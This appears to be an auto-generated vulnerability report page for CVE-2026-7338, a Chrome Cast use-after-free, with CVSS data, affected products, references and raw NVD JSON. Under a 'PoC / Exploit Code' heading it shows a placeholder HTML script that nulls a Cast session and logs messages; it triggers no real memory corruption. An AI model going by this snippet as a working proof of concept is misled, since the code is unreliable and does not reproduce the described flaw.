Security Vulnerability Report
CVE-2026-7338 CVSS 7.5 HIGH

Published: 2026-04-28 23:16:21
Last Modified: 2026-04-30 18:28:23

Description

Use after free in Cast in Google Chrome prior to 147.0.7727.138 allowed an attacker on the local network segment to potentially exploit heap corruption via malicious network traffic. (Chromium security severity: High)

CVSS Details

CVSS Score: 7.5
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:google:chrome:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:apple:macos:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:* - NOT VULNERABLE
Google Chrome < 147.0.7727.138

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
html
<!--
// Conceptual Proof of Concept for CVE-2026-7338
// Target: Google Chrome Cast Component (UAF)
// Context: Attacker on local network segment
-->
<html>
<head><title>Chrome Cast UAF PoC</title></head>
<body>
<script>
function attemptExploit() {
  try {
    // Check if Cast API is available
    if (window.chrome && window.chrome.cast) {
      // Simulate the sequence that triggers the Use-After-Free
      // Step 1: Initialize Cast session
      var session = new window.chrome.cast.Session();
      // Step 2: Force object invalidation (simulated)
      // In a real scenario, specific network traffic would corrupt the heap
      session = null;
      // Step 3: Trigger access to freed memory
      // Malicious payload construction would happen here
      console.log("[+] Triggering UAF condition...");
    } else {
      console.log("Cast API not found in this environment.");
    }
  } catch (e) {
    console.log("Exploit attempt failed: " + e.message);
  }
}
setInterval(attemptExploit, 1000);
</script>
<p>Check console for PoC execution status.</p>
</body>
</html>

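References

https://chromereleases.googleblog.com/2026/04/stable-channel-update-for-desktop_28.html - Vendor Advisory
https://issues.chromium.org/issues/502449857 - Permissions Required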

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-7338", "sourceIdentifier": "[email protected]", "published": "2026-04-28T23:16:21.370", "lastModified": "2026-04-30T18:28:23.367", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Use after free in Cast in Google Chrome prior to 147.0.7727.138 allowed an attacker on the local network segment to potentially exploit heap corruption via malicious network traffic. (Chromium security severity: High)"}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.6, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-416"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:google:chrome:*:*:*:*:*:*:*:*", "versionEndExcluding": "147.0.7727.138", "matchCriteriaId": "162EE53D-80A0-4153-B6D6-B2EF01E0BDAE"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:o:apple:macos:-:*:*:*:*:*:*:*", "matchCriteriaId": "387021A0-AF36-463C-A605-32EA7DAC172E"}, {"vulnerable": false, "criteria": "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*", "matchCriteriaId": "703AF700-7A70-47E2-BC3A-7FD03B3CA9C1"}, {"vulnerable": false, "criteria": "cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:*", "matchCriteriaId": "A2572D17-1DE6-457B-99CC-64AFD54487EA"}]}]}], "references": [{"url": "https://chromereleases.googleblog.com/2026/04/stable-channel-update-for-desktop_28.html", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://issues.chromium.org/issues/502449857", "source": "[email protected]", "tags": ["Permissions Required"]}]}}